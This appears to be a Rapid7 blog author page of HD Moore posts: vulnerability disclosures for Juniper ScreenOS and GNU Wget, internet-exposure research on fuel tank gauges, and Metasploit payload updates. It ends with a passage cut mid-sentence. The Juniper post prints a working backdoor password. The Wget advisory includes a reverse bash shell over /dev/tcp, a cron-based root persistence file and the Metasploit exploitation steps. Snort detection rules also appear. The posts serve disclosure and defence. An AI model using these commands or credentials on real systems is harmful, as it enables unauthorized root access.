Rapid7 Blog

HD Moore  

AUTHOR STATS:

40

Six Wonderful Years

Rapid7 has been my home for the last six years, growing from 98 people when I joined to over 700 today. Keeping up with the growth has been both exhilarating and terrifying. I am really proud of our Austin team, the Metasploit ecosystem, and our…

Rapid7 has been my home for the last six years, growing from 98 people when I joined to over 700 today. Keeping up with the growth has been both exhilarating and terrifying. I am really proud of our Austin team, the Metasploit ecosystem, and our leadership in security research. We care about our customers, our employees, and our impact in the industry. Working at Rapid7 has simply been the best job I have ever had. We have surpassed every goal that I set when I joined in 2009. Metasploit is thriving. Our research continues to shine light on exposures both wide and deep. Rapid7 is recognized as a champion of open source development. Rapid7 is a solid brand name in both enterprise security and the security community. We have helped shape vulnerability disclosure and the politics of security research. We scan the internet, legally, and share the data with the world. We help our customers improve their security while continuing to support the security community. Late last year, a friend of mine offered me an inspiring opportunity. After some reflection, I realized that the role he described was a natural evolution of my career in this industry. I will be leaving Rapid7 to help build a new venture capital firm focused on helping early-stage security companies get to market faster. Since the only thing more insane than working at one startup is working with multiple startups at the same time, this seemed like a perfect match and a way to contribute back to the security community. Although my last day at Rapid7 is January 29th, I will not be going far. I will continue to work on the Metasploit Framework and stay active in the community. I have full faith that the Metasploit team will continue to build great things and put our users first. Similarly, Rapid7 continues to increase its investment in security research and will still share findings to benefit the security community as a whole and help people protect themselves. Rapid7 has a unique position in the industry and an amazing team.  I have no doubt that the company's best days are ahead. Although I won't be with the company, I will be cheering from the sidelines. -HD

CVE-2015-7755: Juniper ScreenOS Authentication Backdoor

On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinct issues; a backdoor in the VPN implementation that allows a passive eavesdropper to decrypt traffic and…

On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinct issues; a backdoor in the VPN implementation that allows a passive eavesdropper to decrypt traffic and a second backdoor that allows an attacker to bypass authentication in the SSH and Telnet daemons. Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate. Juniper's advisory mentioned that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected. Juniper provided a new 6.2.0 and 6.3.0 build, but also rebuilt older packages that omit the backdoor code. The rebuilt older packages have the "b" suffix to the version and have a minimal set of changes, making them the best candidate for analysis. In order to analyze the firmware, it must be unpacked and then decompressed. The firmware is distributed as a ZIP file that contains a single binary. This binary is a decompression stub followed by a gzip-compressed kernel. The x86 images can be extracted easily with binwalk, but the XScale images require a bit more work. ScreenOS is not based on Linux or BSD, but runs as a single monolithic kernel. The SSG500 firmware uses the x86 architecture, while the SSG5 and SSG20 firmware uses the XScale (ARMB) architecture. The decompressed kernel can be loaded into IDA Pro for analysis. As part of the analysis effort, we have made decompressed binaries available in a GitHub repository. Although most folks are more familiar with x86 than ARM, the ARM binaries are significantly easier to compare due to minimal changes in the compiler output. In order to load the SSG5 (ssg5ssg20.6.3.0r19.0.bin) firmware into IDA, the ARMB CPU should be selected, with a load address of 0x80000 and a file offset of 0x20. Once the binary is loaded, it helps to identify and tag common functions. Searching for the text "strcmp" finds a static string that is referenced in the sub_ED7D94 function. Looking at the strings output, we can see some interesting string references, including auth_admin_ssh_special and auth_admin_internal. Searching for auth_admin_internal finds the sub_13DBEC function. This function has a strcmp call that is not present in the 6.3.0r19b firmware: The argument to the strcmp call is <<< %s(un='%s') = %u, which is the backdoor password, and was presumably chosen so that it would be mistaken for one of the many other debug format strings in the code. This password allows an attacker to bypass authentication through SSH and Telnet. If you want to test this issue by hand, telnet or ssh to a Netscreen device, specify any username, and the backdoor password. If the device is vulnerable, you should receive an interactive shell with the highest privileges. The interesting thing about this backdoor is not the simplicity, but the timing. Juniper's advisory claimed that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected, but the authentication backdoor is not actually present in older versions of ScreenOS. We were unable to identify this backdoor in versions 6.2.0r15, 6.2.0r16, 6.2.0r18 and it is probably safe to say that the entire 6.2.0 series was not affected by this issue (although the VPN issue was present). We were also unable to identify the authentication backdoor in versions 6.3.0r12 or 6.3.0r14. We could confirm that versions 6.3.0r17 and 6.3.0r19 were affected, but were not able to track down 6.3.0r15 or 6.3.0r16. This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17). Detecting the exploitation of this issue is non-trivial, but there are a couple things you can do. Juniper provided guidance on what the logs from a successful intrusion would look like: 2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from ….. 2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user ‘username2’ at host … Although an attacker could delete the logs once they gain access, any logs sent to a centralized logging server (or SIEM) would be captured, and could be used to trigger an alert. Fox-IT has a created a set of Snort rules that can detect access with the backdoor password over Telnet and fire on any connection to a ScreenOS Telnet or SSH service: # Signatures to detect successful abuse of the Juniper backdoor password over telnet. # Additionally a signature for detecting world reachable ScreenOS devices over SSH. alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;) alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;) alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;) alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;) Robert Nunley has created a set of Sagan rules for this issue: sagan-rules/juniper.rules sagan-rules/juniper-geoip.rules If you are trying to update a ScreenOS system and are running into issues with the signing key, take a look at Steve Puluka's blog post. We would like to thank Ralf-Philipp Weinmann of Comsecuris for his help with unpacking and analyzing the firmware and Maarten Boone of Fox-IT for confirming our findings and providing the Snort rules above. Update: Fox-IT reached out and confirmed that any username can be used via Telnet or SSH with the backdoor password, regardless of whether it is valid or not. Update: Juniper has confirmed that the authentication backdoor only applies to revisions 6.3.0r17, 6.3.0r18, 6.3.0r19, and 6.3.0r20 Update: Details on CVE-2015-7756 have emerged. The Wired article provides a great overview as well. -HD

Meterpreter Survey 2015: You spoke, we listened, then wrote a bunch of code.

The Survey One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions…

The Survey One month ago we asked the community for feedback about how they use Metasploit and what they want to see in the Meterpreter payload suite going forward. Over the course of a week we received over 400 responses and over 200 write-in suggestions for new features. We have spent the last month parsing through your responses, identifying dependencies, and actively delivering new features based on your requests. These requests covered 20 different categories: General Feedback Metasploit Framework Features Metasploit RPC API Feedback The Antivirus Ate My Payload Meterpreter Platform Support Mimikatz Integration Meterpreter Pivoting Privilege Escalation Remote File Access Meterpreter Features Metepreter Stager Support Meterpreter Transport Flexibility Meterpreter HTTP Transport Options Meterpreter Proxy Support Communication Protection Communications Evasion Session Handlers Session Reliability Android Meterpreter Features Payload Generation We merged similar requests, removed duplicate items, and reworded many of the suggestions so far. For the issues specific to Meterpreter, you can now find them listed on the Meterpreter Wishlist. If you don't see your feedback listed, it was either merged into another item, or wasn't Meterpreter specific (Metasploit features, AV feedback, RPC API feedback, etc). After parsing through these, we grouped up similar items, figured out the missing dependencies, started building out a rough plan for 2015, and got down to business. Over the last two weeks we have made some serious progress, mostly focused on the work that has to be done before we can tackle the bigger features on this list. The wishlist items marked [DONE] were the result of this first sprint while the rest of the items listed as [IN PROGRESS] are being actively worked on by either myself, OJ Reeves, or Brent Cook. While there is no realistic chance that we can get to every feature that was submitted, we are going to try to build out enough supporting functionality that the community can tackle the wider group of features with minimum pain. If something jumps out that you want to work on, please join the IRC channel and see if there are any blocking issues before diving in. Once you have a green light, send us a pull request once you are ready for feedback. If you can't contribute, no worries, keep reading for what is done so far, and where we are headed. Attacks Have Changed The Metasploit Project started in 2003 with a broad goal of sharing information about exploit techniques and making the development of new security tools much easier. This was a time when shellcode golf was the name of the game, SEH overwrites had hackers yelling "POP, POP, RET!", and databases of opcodes at static addresses made exploit development possible for systems you didn't even have. Fast-forward a decade and exploit mitigations at the OS level have made traditional exploit methods obsolete and complicated reliable remote exploitation; at least for memory corruption vulnerabilities. At the same time, anti-virus tools, anti-malware network gateways, and SSL-inspecting web proxies have become a thorn in the side of many professional penetration testers. This shift away from memory corruption vulnerabilities hasn't decreased the number of compromises, nor has the availability of new security technologies, but the way networks get compromised has changed. As operating system and compiler vendors made memory corruption vulnerabilities more complicated on end-user and server platforms, attackers have shifted to the weakest links, which are typically the actual employees, their devices, and their passwords. Metasploit has continued to evolve to support these use cases, with a focus on client-side applications, web applications, embedded devices, and attacking the credentials themselves. The one area where Metasploit hasn't changed however, has been payloads. For the better part of 12 years, Metasploit payloads and encoders have had one primarily goal: fit inside of the exploits. This works great when Metasploit users are getting shells through memory corruption flaws, but doesn't make a lot of sense when attacks can deliver a multi-megabyte executable or JAR file onto the target. As a result, Metasploit payloads have been artificially constrained in terms of functionality and error handling. That has now changed. Payloads and encoders can now opt-in to new features, better error handling, and network-level evasion when they have the room for it. This is now enabled by default when using msfvenom (specificy -s to tell the payload how much space it can use). Separate, but related, was the slow startup time of the Metasploit Console (msfconsole). A few months ago, many users had to wait up to 30 seconds to use msfconsole on a modern system. After the switch to Ruby 2.1.5, this dropped to under 10 seconds for most users. Most recently, payloads now cache their static size, allowing us to use Metasm to generate and compile assembly on the fly, and knocking quite a bit of processing out of the startup time. Running the latest version of msfconsole on a SSD-enabled system with Ruby 2.1.5 can result in startup times between 1 and 5 seconds. These two changes pave the way to solving the number one piece of feedback: Payload size doesn't matter that much anymore. Many people use Metaslpoit payloads without exploits, either by delivering the payloads manually, or combining them with third-party tools like SET, and these payloads should support advanced options and handle network errors gracefully. Metasploit payloads now selectively enable functionality based on your use case and the available space. Sprint 1 Features The features below were some of the first dependencies needed to really tackle the features requested in the survey. These are available in the Metasploit Framework master branch today and will be going out to Metasploit Pro, Metasploit Express, Metasploit Community, and Kali Linux users this week. HTTP Stagers The reverse_http and reverse_https in stagers have been around for a few years and they solve a number of problems related to session egress within corporate networks, but they were starting to get dusty. First of all, we continued to add new versions of these payloads to handle specific use cases, like proxies, proxy authentication, and hopping through intermediate web services. We are now actively working on a complete refactor that merges all of this functionality into a smaller set of smarter payloads. In addition to bug fixes, better error handling, and size-aware feature selection, these payloads have been expanded with some new functionality: Long URIs: The reverse_http and reverse_https stagers now use much longer URIs by default. The old default was to use a 5-byte URI, but these were starting to get blocked by a number of web proxies. The new default is use a random URI between 30 and 255 bytes. WinHTTP: Borja Merino submitted a really nice set of reverse_winhttp and reverse_winhttps stagers. These stagers switch to the WinHTTP API (from WinInet), which helps bypass certain anti-malware implementations, and builds the base for a number of new features. The development started off as Borja's PR and eventually got rolled into the new Metasm base payload. SSL Validation: SSL certificate verification is now available in the reverse_winhttps stager. You can enable this by generating a payload with the HandlerSSLCert option set to the file name of a SSL certificate (PEM format) and setting the StagerVerifySSLCert option to true. The Metasploit exploit or exploit/multi/handler listener should set these options to the same value. Once these are set, the stager will verify that the SSL certificate presented by the Metasploit listener matches the SHA-1 hash of the HandlerSSLCert certificate and will exit if they don't match. This is a great way to make sure that a SSL-inspecting proxy isn't monkeying with your session and provides stager-level authentication that is resistant to man-in-the-middle attacks, even if the target system has a malicious CA root certificate installed. If you want to make this apply to all future uses of reverse_winhttp, use the setg command in msfconsole to configure HandlerSSLCert and StagerVerifySSLCert, then save to make these the default. We still have a lot more work to do on HTTP stagers, so keep an eye on ticket #4895 if you want to keep up on the latest changes. Meterpreter SSL Verification Updating the WinHTTP stagers to support SSL Verification is only part of the puzzle. OJ Reeves also delivered SSL certification validation in the Windows Meterpreter payloads. These can be enabled using the same HandlerSSLCert and StagerVerifySSLCert options as the stagers. If you set these within an exploit, the entire process is automatic, but if you are using exploit/multi/handler, be sure to set them both in the msfvenom generation (stageless or otherwise) as well as the listener. Note that verification occurs after the HTTP request has been sent. As a result you will get a "dead" session when the Meterpreter is enforcing this setting and doesn't see the right SSL certificate. We are looking into better solutions for this going forward. Meterpreter "Stageless" Payloads One often-requested feature was the ability to run Meterpreter without the shellcode stager. A project called Inmet (ultmet.exe) is best known for providing a stageless metsrv in the past, but this implementation wasn't as smooth as it should have been due to incompatibilities in the framework. Over the last two weeks, OJ Reeves has delivered an impressive approach to stageless Meterpreters and I strongly recommend that you check out his post on the topic. This is the first step to implement many of the advanced features requested in the survey. Meterpreter Unicode (최고) Nearly all Meterpreter payloads will support Unicode file and directory names, converting between UTF-8 and native string implementations as needed. If you used Metasploit outside of the US in the past, you may be familiar with the EnableUnicodeEncoding option in Meterpreter. Previously, this was set to true by default, and would translate garbled Unicode names into identifiers that looked like $U$-0xsomething. This made it possible to work with non-native encodings, but it wasn't much fun. Fortunately, so long as your Linux terminal supports UTF-8, this is no longer necessary. Windows users still need the EnableUnicodeEncoding crutch since Console2 doesn't implicitly support Unicode, but everyone else should be good to go for full Unicode support going forward. Unicode is still  a work in process, but it is nearly complete across all Meterpreter payloads: The Python and Windows Meterpreters have full Unicode support for file system operations. The PHP Meterpreter has support only on non-Windows platforms due to API limitations. The Java & Android Meterpreter have a pending pull request adding support for Windows and non-Windows. Note that Unicode is not automatically translated for shell sessions (or shell channels in Meterpreter). This is a bit more complicated, but is on our radar for long-term support. Meterpreter MS-DOS "short" Names Meterpreter now displays MS-DOS 8.3 "short" names when you use the ls command with the -x parameter on Windows. This makes it easy to copy, rename, and generally manipulate a file or directory with an unwieldy name. A quick and easy win and really useful in a pinch. Next Steps: April 2015 Our plans for the next month are centered around improving the Meterpreter code organization and build process, supporting unique embedded payload IDs (a precursor for universal listeners), improving the reliability and resilience of all Meterpreter transports, adding support for live transport switching to Meterpreter, and improving the usability of all of these features as we go. There is a ton of work to do, but these efforts will lay the groundwork for approaching the rest of the wishlist going forward. One of our goals is to maintain complete backwards compatibility with both old Metasploit installations and their associated payloads. More often than not this means taking two steps forward and one back as we make small incremental changes in quick succession. In addition to the fun part (the code), we will be updating the test suites and documentation as we go as well. May 2015 and Beyond We are looking at May as the time when we can start seriously considering BIG features. These may include remote scripting engines, enhanced pivoting, pluggable transports, and a deep dive into mobile device support. Figuring out what is going to fit and how to prioritize it is going to be driven by engineering challenges as much as community feedback and contributions. As attacks change, so will Metasploit, and the time has come for payloads to take the next big step. Onward, through the pull requests! -HD

The Internet of Gas Station Tank Gauges

Introduction Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill), and to perform leak tests in accordance with environmental regulatory compliance. ATGs are used by…

Introduction Automated tank gauges (ATGs) are used to monitor fuel tank inventory levels, track deliveries, raise alarms that indicate problems with the tank or gauge (such as a fuel spill), and to perform leak tests in accordance with environmental regulatory compliance. ATGs are used by nearly every fueling station in the United States and tens of thousands of systems internationally. Many ATGs can be programmed and monitored through a built-in serial port, a plug-in serial port, a fax/modem, or a TCP/IP circuit board. In order to monitor these systems remotely, many operators use a TCP/IP card or a third-party serial port server to map the ATG serial interface to an internet-facing TCP port. The most common configuration is to map these to TCP port 10001. Although some systems have the capability to password protect the serial interfaces, this is not commonly implemented. Approximately 5,800 ATGs were found to be exposed to the internet without a password. Over 5,300 of these ATGs are located in the United States, which works out to about 3 percent of the approximately 150,000 [1] fueling stations in the country. An attacker with access to the serial port interface of an ATG may be able to shut down the station by spoofing the reported fuel level, generating false alarms, and locking the monitoring service out of the system. Tank gauge malfunctions are considered a serious issue due to the regulatory and safety issues that may apply. Who is affected? An Internet-wide scan on January 10th, 2015 [3] identified approximately 5,800 ATGs with TCP port 10001 exposed to the internet and no password set. The majority of these systems belong to retail gas stations, truck stops, and convenience stores. A number of major brands and franchises were represented in the dataset. An unknown number of ATGs are exposed through modem access. The majority of the ATGs appear to be manufactured by Vedeer-Root, one of the largest vendors in this space, and were identified on IP ranges associated with consumer broadband services. The graphs below indicate the top 10 states with exposed ATGs followed by a breakdown of ATGs by ISP. How serious is this? ATGs are designed to detect leaks and other problems with fuel tanks. In our opinion, remote access to the control port of an ATG could provide an attacker with the ability to reconfigure alarm thresholds, reset the system, and otherwise disrupt the operation of the fuel tank. An attack may be able to prevent the use of the fuel tank entirely by changing access settings and simulating false conditions, triggering a manual shutdown. Theoretically, an attacker could shut down over 5,300 fueling stations in the United States with little effort. How was the issue discovered? Jack Chadowitz, founder of Kachoolie, a BostonBase Inc. spin off, reached out to Rapid7 on January 9th, 2015 [3] after reading about Rapid7's previous research into publicly exposed serial port servers. Mr. Chadowitz became aware of the ATG vulnerabilities through his work in the industry and developed a web-based portal to test the exposure as well as a secure alternative solution. Mr. Chadowitz asked Rapid7 for assistance investigating the issue at a global level. On January 10th, Rapid7 conducted an internet-wide scan for exposed ATGs with TCP port 10001 exposed to the internet. Rapid7 sent a Get In-Tank Inventory Report request (I20100) to every IPv4 address [2] that had TCP port 10001 open. The response to this request included the station name, address, number of tanks, tank levels, and fuel types. Is this being exploited in the wild? How exploitable is it? To the best of our knowledge this issue is not being exploited in the wild. However, it would be difficult to tell the difference between an intentional attack and a system failure. Public documentation from Vedeer-Root provides detailed instructions on how to manipulate ATGs using the serial interface, which also applies to the TCP/IP interface on port 10001. No special tools are necessary to interact with exposed ATGs. What can be done to mitigate or remediate? Operators should consider using a VPN gateway or other dedicated hardware interface to connect their ATGs with their monitoring service. Less-secure alternatives including applying source IP address filters or setting a password on each serial port. Footnotes 1. The 2012 US Census counted 112,000 gas stations, however the 2015 number has been estimated by an industry expert to be closer to 150,000 (including private facilities). 2.  Rapid7 used the existing Project Sonar infrastructure to conduct the ATG scan. This system skips networks where the owners have explicitly requested that their systems be excluded from future scans. At the time of the ATG scan, approximately 6.5 million addresses were excluded from the routable IPv4 address space. 3. An earlier version of this post incorrectly stated the dates as 2014, not 2015.

12 Days of HaXmas: Metasploit, Nexpose, Sonar, and Recog

This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.The Metasploit Framework uses operating system and service fingerprints for automatic…

This post is the tenth in a series, 12 Days of HaXmas, where we take a look at some of more notable advancements and events in the Metasploit Framework over the course of 2014.The Metasploit Framework uses operating system and service fingerprints for automatic target selection and asset identification. This blog post describes a major overhaul of the fingerprinting backend within Metasploit and how you can extend it by submitting new fingerprints.Historically, Metasploit wasn't great at fingerprinting. Shortly after the Rapid7 acquisition, we added an internal fingerprinting system to the framework, but we still depended on imports from Nexpose, Nmap, and other external tools to obtain comprehensive results. The only areas where fingerprint coverage was passable were the SMB, HTTP, and web browser rules, since many modules depended on these for automatic configuration. Metasploit has the ability to import data from dozens of external sources, including web application scanners, vulnerability scanners, and even raw PCAP files. Normalizing all of this data was a challenge and the fingerprinting backend had the job of squashing conflicting OS and service names into something that modules could easily understand.By mid-2013, Metasploit's fingerprints were getting stale and the ruleset was becoming more tangled than ever. Changing one fingerprint required carefully reviewing all of the code paths where a conflicting rule might override the resulting value. New operating systems and services were released and the backend simply wasn't keeping up. For our Metasploit Pro customers, this was less of an issue due to the direct integration with Nexpose and Nmap, but we needed a fresh approach all the same.Earlier in 2013, my team was looking at whether we could improve our products using existing internet-wide scan data. Our first project involved an overhaul of the Nexpose SNMP fingerprints by leveraging the Critical.IO dataset. Nexpose fingerprints are stored as a series of regular expressions within XML files. These fingerprints were easy to read, write, and test. Over the course of a week we were able to expand Nexpose's SNMP system description fingerprints to cover approximately 85% of the devices found on the internet by the Critical.IO SNMP scan. This was a quick win and made it clear that we should be looking at internet scan data as a primary source of new fingerprints.In 2014, we took the same approach using the Project Sonar data to add fingerprints for popular HTTP services. Our approach was to sort the raw scan data by frequency, determine which fingerprints would cover the largest number of systems, and then sit down and write those fingerprints. This work improved fingerprint accuracy for our Nexpose customers and provided an opportunity to do targeted vulnerability research on the most widely exposed devices and services. The issues with the Metasploit fingerprints remained, but a plan was starting to come together.First, we had to get sign-off to open source the Nexpose fingerprint database. Next, we had write some wrapper code that made interfacing with and testing these fingerprints quick and painless. Finally, we had to rip out the existing Metasploit fingerprinting engine, normalize the entire framework to use the new fingerprints, and add some glue code to map Nexpose conventions to what Metasploit expected. This required a major effort across the Nexpose, Metasploit, and Labs teams and took the better part of five months to finally deliver.The result was Recog, an open source recognition framework. Recog is now the upstream for both Nexpose and Metasploit fingerprints. We will continue to leverage Project Sonar to add and improve fingerprints, but even better, our customers and open source users can now submit new fingerprints of their own. Recog is available under a BSD 2-Clause license and can be used within your own projects, open source or otherwise, and although the test framework is written in Ruby, the XML fingerprints are easy to process in just about every language.Metasploit users benefit through consistent formatting of third-party data imports, better fingerprinting when using scanner modules, and support for targeting newer operating systems and web browsers. Nexpose users will continue to see improvements to fingerprinting, with several major leaps in coverage as Project Sonar progresses. Metasploit contributors can take advantage of the new fingerprint.match note type to provide fingerprint suggestions to the new matching engine. If you are interested in the mechanics of how Metasploit interfaces with Recog, take a look at the OS normalization code in MDM.Recog is a great example of Rapid7's commitment to open source and our desire to collaborate with the greater information security community. Although writing fingerprints isn't the most exciting task, accurate fingerprints are a requirement for reliable vulnerability assessments and successful penetration tests. If you are looking for a chance to contribute to Metasploit, or simply want better fingerprinting for systems within your own network, please considering submitting updates to Recog. Feel free to drop by the #metasploit channel on the Freenode IRC network if you would like to chat with the development team. If you have a new fingerprint but don't feel comfortable sending a pull request, feel free to file an Issue within Recog repository on Github instead.-HD

2015: Project Sonar Wiki & UDP Scan Data

Project Sonar started in September of 2013 with the goal of improving security through the active analysis of public networks. For the first few months, we focused almost entirely on SSL, DNS, and HTTP enumeration. This uncovered all sorts of interesting security issues and contributed…

Project Sonar started in September of 2013 with the goal of improving security through the active analysis of public networks. For the first few months, we focused almost entirely on SSL, DNS, and HTTP enumeration. This uncovered all sorts of interesting security issues and contributed to a number of advisories and research papers. The SSL and DNS datasets were especially good at identifying assets for a given organization, often finding systems that the IT team had no inkling of. At this point, we had a decent amount of automation in place, and decided to start the next phase of Project Sonar, scanning UDP services.While we received a few opt-out requests for HTTP scans in the past, these were completely eclipsed by the number of folks requesting to be excluded after our UDP probes generated an alert on their IDS or firewall. Handling opt-out requests became a part-time job that was rotated across the Labs team. We tried and often succeeded at rolling out exclusions within a few minutes of receiving a request, but it came at the cost of getting other work done. At the end of the day, the value of the data, and our ability to improve public security depended on having consistent scan data across a range of services. As of mid-December, the number of opt-out requests has leveled off, and we had a chance to starting digging into the results.There was some good news for a change:VxWorks systems with an internet-exposed debug service have dropped from a peak of ~300,000 in 2010 to around ~61,000 in late 2014Servers with the IPMI protocol exposed to the internet have dropped from ~250,000 in June to ~214,000 in December 2014NTP daemons with monlist enabled have decreased somewhere between 25-50% (our data doesn't quite agree with ShadowServer's)The bad news is that most of the other stats stayed relatively constant across six months:Approximately 200,000 Microsoft SQL Servers are still responding to UDP pings and many of these are end-of-life versionsOver 15,000,000 devices expose SIP to the internet and about half of these are from a single vendor in a single region.One odd trend was a consistent increase in the number of systems exposing NATPMP to the internet. This number has increased from just over 1 million in June to 1.3 million in December. Given that NATPMP is never supposed to be internet facing, this points to even more exposure 2015.We conducted over 330 internet-wide UDP scans in 2014, covering 13 different UDP probes, and generating over 96 gigabytes of compressed scan data. All of this data is now immediately available along with a brand new wiki that documents what we scan and how to use the published data.2015 is looking like a great year for security research!-HD

R7-2014-15: GNU Wget FTP Symlink Arbitrary Filesystem Access

Introduction GNU Wget is a command-line utility designed to download files via HTTP, HTTPS, and FTP.  Wget versions prior to 1.16 are vulnerable a symlink attack (CVE-2014-4877) when running in recursive mode with a FTP target. This vulnerability allows an attacker operating a malicious…

Introduction GNU Wget is a command-line utility designed to download files via HTTP, HTTPS, and FTP.  Wget versions prior to 1.16 are vulnerable a symlink attack (CVE-2014-4877) when running in recursive mode with a FTP target. This vulnerability allows an attacker operating a malicious FTP server to create arbitrary files, directories, and symlinks on the user's filesystem. The symlink attack allows file contents to be overwritten, including binary files, and access to the entire filesystem with the permissions of the user running wget. This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys. Vulnerability The flaw is triggered when wget receives a directory listing that includes a symlink followed by a directory with the same name. The output of the LIST command would look like the following, which is not possible on a real FTP server. lrwxrwxrwx 1 root root 33 Oct 28 2014 TARGET -> / drwxrwxr-x 15 root root 4096 Oct 28 2014 TARGET Wget would first create a local symlink named TARGET that points to the root filesystem. It would then enter the TARGET directory and mirror its contents across the user's filesystem. Remediation Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch. If you use a distribution that does not ship a patched version of wget, you can mitigate the issue by adding the line retr-symlinks=on to either /etc/wgetrc or ~/.wgetrc. This issue is only exploitable when running wget with recursive mode against a FTP server URL. Although a HTTP service can redirect wget to a FTP URL, it implicitly disables the recursive option after following this redirect, and is not exploitable in this scenario. Exploitation We have released a Metasploit module to demonstrate this issue. In the example below, we demonstrate obtaining a reverse command shell against a user running wget as root against a malicious FTP service. This example makes use of the cron daemon and a reverse-connect bash shell. First we will create a reverse connect command string using msfpayload. # msfpayload cmd/unix/reverse_bash LHOST=192.168.0.4 LPORT=4444 R 0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112 Next we create a crontab file that runs once a minute, launches this command, and deletes itself: # cat>cronshell <<EOD PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin * * * * * root bash -c '0<&112-;exec 112<>/dev/tcp/192.168.0.4/4444;sh <&112 >&112 2>&112'; rm -f /etc/cron.d/cronshell EOD Now we start up msfconsole and configure a shell listener: # msfconsole msf> use exploit/multi/handler msf exploit(handler) > set PAYLOAD cmd/unix/reverse_bash msf exploit(handler) > set LHOST 192.168.0.4 msf exploit(handler) > set LPORT 4444 msf exploit(handler) > run -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.0.4:4444 Finally we switch to the wget module itself: msf exploit(handler) > use auxiliary/server/wget_symlink_file_write msf auxiliary(wget_symlink_file_write) > set TARGET_FILE /etc/cron.d/cronshell msf auxiliary(wget_symlink_file_write) > set TARGET_DATA file:cronshell msf auxiliary(wget_symlink_file_write) > set SRVPORT 21 msf auxiliary(wget_symlink_file_write) > run [+] Targets should run: $ wget -m ftp://192.168.0.4:21/ [*] Server started. At this point, we just wait for the target user to run wget -m ftp://192.168.0.4:21/ [*] 192.168.0.2:52251 Logged in with user 'anonymous' and password 'anonymous'... [*] 192.168.0.2:52251 -> LIST -a [*] 192.168.0.2:52251 -> CWD /1X9ftwhI7G1ENa [*] 192.168.0.2:52251 -> LIST -a [*] 192.168.0.2:52251 -> RETR cronshell [+] 192.168.0.2:52251 Hopefully wrote 186 bytes to /etc/cron.d/cronshell [*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.2:58498) at 2014-10-27 23:19:02 -0500 msf auxiliary(wget_symlink_file_write) > sessions -i 1 [*] Starting interaction with 1... id uid=0(root) gid=0(root) groups=0(root),1001(rvm) Disclosure Timeline The issue was discovered by HD Moore of Rapid7, and was disclosed to both the upstream provider of Wget and CERT/CC as detailed below: DateActionThu, Aug 28, 2014Issue discovered by HD Moore and advisory writtenThu, Aug 28, 2014Advisory provided to Giuseppe Scrivano, the maintainer of WgetSat, Sep 01, 2014Vendor responded, confirmed issue and patchTue, Sep 30, 2014Advisory provided to CERT/CCTue, Oct 07, 2014CVE-2014-4877 assigned via CERT/CCMon, Oct 27, 2014Redhat bug 1139181 publishedTue, Oct 28, 2014Rapid7 advisory and Metasploit module published as PR 4088

R7-2014-16: Palo Alto Networks User-ID Credential Exposure

Project Sonar tends to identify unexpected issues, especially with regards to network security products. In July of this year, we began to notice a flood of incoming SMB connections every time we launched the VxWorks WDBRPC scan. To diagnose the issue, we ran the Metasploit…

Project Sonar tends to identify unexpected issues, especially with regards to network security products. In July of this year, we began to notice a flood of incoming SMB connections every time we launched the VxWorks WDBRPC scan. To diagnose the issue, we ran the Metasploit SMB Capture module on one of our scanning nodes and collected the results. After reviewing the data, we realized a common trend in the usernames of the incoming SMB connections.After some digging, we traced this back to the Palo Alto Networks (PAN) User-ID feature, an optional component provided by PAN that "gives network administrators granular controls over what various users are allowed to do when filtered by a Palo Alto Networks Next-Generation Firewall ". We contacted PAN and they confirmed that some of their customers must have misconfigured User-ID to enable the feature on external/untrusted zones. In summary, every time we triggered a PAN filter on a misconfigured appliance, our scanning node would receive an inbound authentication attempt by User-ID. This issue is not a vulnerability in the typical sense, but we felt that the impact was significant enough that it required notification and public disclosure.A number of PAN customers have enabled Client Probing and Host Probing within the User-ID settings, but have not limited these probes to trusted zones or the internal IP space of the organization. As a result, an external attacker can trigger a security event on the PAN 